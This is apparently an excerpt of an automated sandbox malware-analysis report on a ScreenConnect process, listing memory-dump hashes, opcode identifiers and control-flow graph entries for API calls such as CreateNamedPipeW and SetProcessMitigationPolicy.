                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6759dab419ebd619b78ccad5224a3ae6e20499a00cadd79c4e831c29ab3c3f32
                                                                                                                            • Instruction ID: 0c5d27a7ffd3d20f3209cf05e4ed1b684ff214e5c0ebf992488e6bc7ee1011bb
                                                                                                                            • Opcode Fuzzy Hash: 6759dab419ebd619b78ccad5224a3ae6e20499a00cadd79c4e831c29ab3c3f32
                                                                                                                            • Instruction Fuzzy Hash: F1D05E71A0110DEFCB40EFA8E94255DBBB9EF48300B1085ADED08E3300EA316F049BD2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dd3205f3f593d8faf5d49d122d144cc8ef6c98e00cef073a42651aecf3f9bd89
                                                                                                                            • Instruction ID: 0c950196b52b8132432153eec3021826b74cbe6be9729febefaa0732a115755c
                                                                                                                            • Opcode Fuzzy Hash: dd3205f3f593d8faf5d49d122d144cc8ef6c98e00cef073a42651aecf3f9bd89
                                                                                                                            • Instruction Fuzzy Hash: 7FD05E751042448FC301CF68D984945BBF4EF59A0872AC0C2E448DB323E222FC19CB56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3fba38206f50bcec93eae874cc752dc9494dbec1eb6218b179c71398fe06e7a7
                                                                                                                            • Instruction ID: aa028e3ddc7fa11ac362256adb2e09ea99ffe665d9d5ed7aed913bc34bcef8eb
                                                                                                                            • Opcode Fuzzy Hash: 3fba38206f50bcec93eae874cc752dc9494dbec1eb6218b179c71398fe06e7a7
                                                                                                                            • Instruction Fuzzy Hash: 8FD0C97194421ECBEB248F80D16A7EEBFB0EB04319F24041ADA02F6180C7B909C4CF92
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f8797138cb017cf5c76d00b77724539ad6ea2ad36a74ac164ca55ca747531c6e
                                                                                                                            • Instruction ID: d90301d7da5131cbdc14022a4a406bfa2702d8f586992a209afebf0b96aa3971
                                                                                                                            • Opcode Fuzzy Hash: f8797138cb017cf5c76d00b77724539ad6ea2ad36a74ac164ca55ca747531c6e
                                                                                                                            • Instruction Fuzzy Hash: 87C08C72000244CFC3009B28C80AB0077A8EF08624F0400E8E108CB733CA20F800C609
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b8f6d0129c2d2f98c93ec36d7d29d3ac1499d93394abb29e5ce92fd37e92a811
                                                                                                                            • Instruction ID: 2d371783cf164befb4790b18836398813ff2cf0ba73f3b2182c098b6add2628d
                                                                                                                            • Opcode Fuzzy Hash: b8f6d0129c2d2f98c93ec36d7d29d3ac1499d93394abb29e5ce92fd37e92a811
                                                                                                                            • Instruction Fuzzy Hash: 08C002B41003009BDA44CB50C984B41B3B5EBA4328F14C299DC55AB226C73AEE4BDB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2fafee7bc2121452527432a2954257c754d9072c8b2ec2ace34559614cb84a3b
                                                                                                                            • Instruction ID: a08842f4855709b0d834c645f95c9cabeaa58a6eca62d2a78c0167c3e3aae9be
                                                                                                                            • Opcode Fuzzy Hash: 2fafee7bc2121452527432a2954257c754d9072c8b2ec2ace34559614cb84a3b
                                                                                                                            • Instruction Fuzzy Hash: ADD0123440D7805FC741DB605C09F153FB5EB41309F0AC0A9E54449063C55B0416DB41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                                                                            • Instruction ID: 50febbe312b41ff2c4c3a49cd703755e7e3a6811debab3536aaf097181569e9c
                                                                                                                            • Opcode Fuzzy Hash: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                                                                            • Instruction Fuzzy Hash: D3C002792501048F8700DB58E688C117BE8AB486143258194E5088B322C621FC018A91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                                                            • Instruction ID: fba1df006ee47b4d62fcc1013010dd0c3d3c4d475ad279116ed82f1df4468255
                                                                                                                            • Opcode Fuzzy Hash: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                                                            • Instruction Fuzzy Hash: D6B092311502088F82009B58D444C0073A8AB08A243010090E1088B232C621FC018A40

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:7.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:8
                                                                                                                            Total number of Limit Nodes:1
                                                                                                                            execution_graph 23299 7ffd9b348014 23301 7ffd9b34801d 23299->23301 23300 7ffd9b348082 23301->23300 23302 7ffd9b3480f6 SetProcessMitigationPolicy 23301->23302 23303 7ffd9b348152 23302->23303 23295 7ffd9b343642 23296 7ffd9b365850 CreateNamedPipeW 23295->23296 23298 7ffd9b365983 23296->23298
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ($U$x(t
                                                                                                                            • API String ID: 0-2355337826
                                                                                                                            • Opcode ID: a3cf2b6d66bfd69429990a270e26cbe368959934ccf25626af3042b0b908db29
                                                                                                                            • Instruction ID: 3859d7efdd8498817fad9dfbfcfb12ce4225c2966d8cf4535893363f6268bc53
                                                                                                                            • Opcode Fuzzy Hash: a3cf2b6d66bfd69429990a270e26cbe368959934ccf25626af3042b0b908db29
                                                                                                                            • Instruction Fuzzy Hash: AC82E662A0E7CA8FE7769B6448266E53FD0EF56310F0505FDC4998F1F3D9187A0A8392
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d46d2eba68c5ac73f57e6ba570d23abc764b7e25156a8115f6feb0e69813098
                                                                                                                            • Instruction ID: ea1a1dd5b1677f775bbdbf67eeed1319eb13eeb2d8e25618d9bd2643eb5b2a4e
                                                                                                                            • Opcode Fuzzy Hash: 4d46d2eba68c5ac73f57e6ba570d23abc764b7e25156a8115f6feb0e69813098
                                                                                                                            • Instruction Fuzzy Hash: 1F138E31A0961D8FDBA8DB68C8A46A877F1FF58300F1541B9D45DDB2A2DE74BE81CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bc13c79d79258f8ca967aa39e705e9b680c31894e027cc9526115e0141d5a3ab
                                                                                                                            • Instruction ID: 9f5ffe41deb33d197c27b01c5cf85a79482ef2487d4708672609e5fa9303d37f
                                                                                                                            • Opcode Fuzzy Hash: bc13c79d79258f8ca967aa39e705e9b680c31894e027cc9526115e0141d5a3ab
                                                                                                                            • Instruction Fuzzy Hash: 4E126771B0EA4F0BEBB9AAA894646B437C2EF54340F1501BDD86DCB1E7DD68B916C340
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 89785275d53569ed15945d7e035595aec24706cdc91acefae802dca496161f0a
                                                                                                                            • Instruction ID: ac6e77107a4557e231f86fb775aef87f771efcf31737322941efecab3d560ca6
                                                                                                                            • Opcode Fuzzy Hash: 89785275d53569ed15945d7e035595aec24706cdc91acefae802dca496161f0a
                                                                                                                            • Instruction Fuzzy Hash: EA22E431B1EA0E4FE7B5E7E884656B963D2EF95300F160079D06DCB2E2DE68BA15C341

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3595353197.00007FFD9B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B340000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b340000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MitigationPolicyProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1088084561-0
                                                                                                                            • Opcode ID: 21fa974af40ecfaf9daa427a38613d492c5f90193de85f68efa0e097e104f31b
                                                                                                                            • Instruction ID: e63d755cab235006e51858cfae27155004081c079a26ee2cd3c8fed8364387ea
                                                                                                                            • Opcode Fuzzy Hash: 21fa974af40ecfaf9daa427a38613d492c5f90193de85f68efa0e097e104f31b
                                                                                                                            • Instruction Fuzzy Hash: 30514C31D1DB494FDB24EFA8984A5E97BE0EF55310F04027FE459C3192DE78A8468B91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 927 7ffd9b343642-7ffd9b3658ba 930 7ffd9b3658c4-7ffd9b365981 CreateNamedPipeW 927->930 931 7ffd9b3658bc-7ffd9b3658c1 927->931 933 7ffd9b365983 930->933 934 7ffd9b365989-7ffd9b3659bc 930->934 931->930 933->934
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3595353197.00007FFD9B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B340000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b340000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2489174969-0
                                                                                                                            • Opcode ID: 2d057e584238e07c72a8135a691117ba9d248c6011e40df09acb768ee2f1449a
                                                                                                                            • Instruction ID: fb97d16a34c2db8a4ce4b7ffa4e3fa4d54c633a1d23c51c54302245860923aba
                                                                                                                            • Opcode Fuzzy Hash: 2d057e584238e07c72a8135a691117ba9d248c6011e40df09acb768ee2f1449a
                                                                                                                            • Instruction Fuzzy Hash: 53519271A1CA1C8FDB68EF5C9846BE9B7E0FB59710F1442AEE44DD3251CB70A9418BC1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1152 7ffd9b65c90f-7ffd9b65c922 1155 7ffd9b65c924-7ffd9b65c92a 1152->1155 1156 7ffd9b65c940-7ffd9b65c947 1152->1156 1157 7ffd9b65c92c-7ffd9b65c93f 1155->1157 1158 7ffd9b65c948-7ffd9b65c965 1155->1158 1156->1158 1157->1156 1161 7ffd9b65c967 1158->1161 1162 7ffd9b65c972-7ffd9b65c9b5 1161->1162 1167 7ffd9b65c9fb-7ffd9b65ca3f 1162->1167 1168 7ffd9b65c9b7-7ffd9b65c9f9 1162->1168 1175 7ffd9b65ca41-7ffd9b65ca4c 1167->1175 1176 7ffd9b65ca85-7ffd9b65caa0 1167->1176 1168->1167 1180 7ffd9b65ca4e-7ffd9b65ca83 1175->1180 1181 7ffd9b65caa8-7ffd9b65cb00 call 7ffd9b659278 1175->1181 1180->1176
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: _
                                                                                                                            • API String ID: 0-701932520
                                                                                                                            • Opcode ID: 4e7f4b1c1b6417d87d5a6203a7d9d16da3a2da768d997d8e398315be4a9fb08e
                                                                                                                            • Instruction ID: 9eadc3cb2db86091129bb32be9ae3fbb71585511bf544013d025f1ac18d3cd2f
                                                                                                                            • Opcode Fuzzy Hash: 4e7f4b1c1b6417d87d5a6203a7d9d16da3a2da768d997d8e398315be4a9fb08e
                                                                                                                            • Instruction Fuzzy Hash: 2E416652B2ED8E0FE794EBAC18B55B437E1FF98260B0500B6D45CCB29BDC58B952C381

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1221 7ffd9b65c919-7ffd9b65c922 1222 7ffd9b65c924-7ffd9b65c92a 1221->1222 1223 7ffd9b65c940-7ffd9b65c947 1221->1223 1224 7ffd9b65c92c-7ffd9b65c93f 1222->1224 1225 7ffd9b65c948-7ffd9b65c967 1222->1225 1223->1225 1224->1223 1229 7ffd9b65c972-7ffd9b65c9b5 1225->1229 1234 7ffd9b65c9fb-7ffd9b65ca3f 1229->1234 1235 7ffd9b65c9b7-7ffd9b65c9f9 1229->1235 1242 7ffd9b65ca41-7ffd9b65ca4c 1234->1242 1243 7ffd9b65ca85-7ffd9b65caa0 1234->1243 1235->1234 1247 7ffd9b65ca4e-7ffd9b65ca83 1242->1247 1248 7ffd9b65caa8-7ffd9b65cb00 call 7ffd9b659278 1242->1248 1247->1243
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: _
                                                                                                                            • API String ID: 0-701932520
                                                                                                                            • Opcode ID: b1497ba7e6dc6f7321a6094ca222ef89aa6974bbff8d2c091d33cf3043deabbb
                                                                                                                            • Instruction ID: fde1a2d8de1daa430db1f9b5972113c839ca1ee035afa4ceea52bfccf4c4e659
                                                                                                                            • Opcode Fuzzy Hash: b1497ba7e6dc6f7321a6094ca222ef89aa6974bbff8d2c091d33cf3043deabbb
                                                                                                                            • Instruction Fuzzy Hash: 0A417752B2DE8E0FE794EB6C58B55B437E1FF98260B0500BAD41CC729BEC58B852C381

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1302 7ffd9b664a61-7ffd9b664a78 1304 7ffd9b664a14 1302->1304 1305 7ffd9b664a7a 1302->1305 1307 7ffd9b664a17-7ffd9b664a3f 1304->1307 1306 7ffd9b664a7c-7ffd9b664a9f 1305->1306 1305->1307 1310 7ffd9b664a46-7ffd9b664a5d 1307->1310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 0-2852464175
                                                                                                                            • Opcode ID: 581682ce1d6bdaaf05bcf003b20ef425c5d9fbec1e06669a88521f3012b78847
                                                                                                                            • Instruction ID: 828e0ba7512c6faeb1313175a6b727805d72b6f48c242d76b5e786b98d89d292
                                                                                                                            • Opcode Fuzzy Hash: 581682ce1d6bdaaf05bcf003b20ef425c5d9fbec1e06669a88521f3012b78847
                                                                                                                            • Instruction Fuzzy Hash: 1D11AB32A0E7896FE36AA77D94654B47BD1DF82250B0845FDD089CF1A7CA1DBE81C340

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1313 7ffd9b65dda2-7ffd9b65ddc4 1315 7ffd9b65ddef-7ffd9b65ddff call 7ffd9b6592c0 1313->1315 1316 7ffd9b65ddc6-7ffd9b65dde9 1313->1316 1319 7ffd9b65de04-7ffd9b65de14 call 7ffd9b65c570 1315->1319 1316->1315
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F'_H
                                                                                                                            • API String ID: 0-3877437601
                                                                                                                            • Opcode ID: bfee1e28dcf142a6e70267e46c7d4e429cdac41fd82bb80de0e1d5e03ce592da
                                                                                                                            • Instruction ID: d611583bc1aa7d95e00826e8e54932a2768d1014660f5a9689299e0793921b02
                                                                                                                            • Opcode Fuzzy Hash: bfee1e28dcf142a6e70267e46c7d4e429cdac41fd82bb80de0e1d5e03ce592da
                                                                                                                            • Instruction Fuzzy Hash: 4601CD71E2551E8EDBA4EBA894A97E8B3B1FF54301F0101F9C11DD61A1DE746ED0CB00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2901c51a176565cf885014137f0801948bd5b90a92e19f5b4745555fb19437b5
                                                                                                                            • Instruction ID: b4f972356b3169670bc468ab967e1ee3d7d49213f17f93507ed6f55f279cda33
                                                                                                                            • Opcode Fuzzy Hash: 2901c51a176565cf885014137f0801948bd5b90a92e19f5b4745555fb19437b5
                                                                                                                            • Instruction Fuzzy Hash: 4842F635A0EA4A4FEB98DFA8C4A19A077E1FF51704B1505F9C0A9CF1A7D969F843CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6081eed045eb6fe19757712fc0b518d687c9d1f4430f7305ff3f89cb3b6b22cf
                                                                                                                            • Instruction ID: a9536ca9a63cda41ce951375cd33e9a2881f4fa74e2d0b1e8de319b02c3431ac
                                                                                                                            • Opcode Fuzzy Hash: 6081eed045eb6fe19757712fc0b518d687c9d1f4430f7305ff3f89cb3b6b22cf
                                                                                                                            • Instruction Fuzzy Hash: F712D271B1EA4E4FE7A9E6A884716B437D1EF5A700F0600BAD49DCB1A3DD68F941C311
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0da0fb440e390227bacc21aa1a1f263e98548894a12bc6c517360e3f1300f62f
                                                                                                                            • Instruction ID: 6ccf62b208d0324a229b32c8efe4cfbea0cb830d43bf281890dd4a4e9e9f3324
                                                                                                                            • Opcode Fuzzy Hash: 0da0fb440e390227bacc21aa1a1f263e98548894a12bc6c517360e3f1300f62f
                                                                                                                            • Instruction Fuzzy Hash: 20D10F35709A098FDADCEF5CC0A5AA573E1FF6470476109A8D06ACF29BCA65F843CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 52ca84b45faac9a4794de474d75da082740c669169e27228376c2adea708ce79
                                                                                                                            • Instruction ID: 27e067a24468c61e53c5c69931e9859b2e65c00dfbf8b466e28992a4f720777e
                                                                                                                            • Opcode Fuzzy Hash: 52ca84b45faac9a4794de474d75da082740c669169e27228376c2adea708ce79
                                                                                                                            • Instruction Fuzzy Hash: 90B1BE34609B098FDFDCEE59C0A5A6573E2FF6430476509ACD06ACF29BCA65F846CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5dc7d2442480fb208e8c8b5ed29015c9aef6bb2f3fc593ba8e4154c9b571a062
                                                                                                                            • Instruction ID: d475e338beb3abc3978358636455ff6bb7eb97b85e2096d7f3b1b2021c4f901f
                                                                                                                            • Opcode Fuzzy Hash: 5dc7d2442480fb208e8c8b5ed29015c9aef6bb2f3fc593ba8e4154c9b571a062
                                                                                                                            • Instruction Fuzzy Hash: 3CA16C31E0E78D8FD769EB68D8255A97BE0EF45300F0501BED05DCB2A2CA25BE46C781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d7e578b0646995a7aa9a11bc7c66d0a9b73b8c46af184346a0dbc82557d6d011
                                                                                                                            • Instruction ID: fb08beb486743f81e20d3920039498f7457053576101823e65f2d6903bd69739
                                                                                                                            • Opcode Fuzzy Hash: d7e578b0646995a7aa9a11bc7c66d0a9b73b8c46af184346a0dbc82557d6d011
                                                                                                                            • Instruction Fuzzy Hash: F5917B32B1EE4E4BE7B8DAA884A95B533D1EF5032070501BAC45ECF1E2EE55B916C3C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4746bd56eef5f8d6653ca0786a10e40375356f33d85ad8d90038d9960caaf1aa
                                                                                                                            • Instruction ID: 4bb85f24725d118f8109ad683745a3f81a2f15de5abaee0dc67bbabeefbd2343
                                                                                                                            • Opcode Fuzzy Hash: 4746bd56eef5f8d6653ca0786a10e40375356f33d85ad8d90038d9960caaf1aa
                                                                                                                            • Instruction Fuzzy Hash: 42810A63E0FAD75BF72156F898764A42B90EF13E54B0E01B6C4E84E0E3DC88B956C741
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0432f3e05ee66564c5a42fa2c226a3e1ba0c2a0bd29681de579a1a53f33fb7b8
                                                                                                                            • Instruction ID: 288dd056c14bd6cc200b6207dad27cd263da7923392c4f1cf666eb779abdddd4
                                                                                                                            • Opcode Fuzzy Hash: 0432f3e05ee66564c5a42fa2c226a3e1ba0c2a0bd29681de579a1a53f33fb7b8
                                                                                                                            • Instruction Fuzzy Hash: 6281B631F1A90F4AEB75EAE480716F962D2EF94345F52003DD46ECB2E1DE78BA51C640
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 51b5cfe5dd71fc9d158cf54676075a976c217784f2bdd83cf2cc622c1d362e6c
                                                                                                                            • Instruction ID: bc2332770e96db226f17c0958c0e8ab5d5772933fa8899dcfc2432a2480479cb
                                                                                                                            • Opcode Fuzzy Hash: 51b5cfe5dd71fc9d158cf54676075a976c217784f2bdd83cf2cc622c1d362e6c
                                                                                                                            • Instruction Fuzzy Hash: 1F617231B1990D8FEB98EBAC8465BB973D2FF98700F1541B8E41DC72AACD68BD418741
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
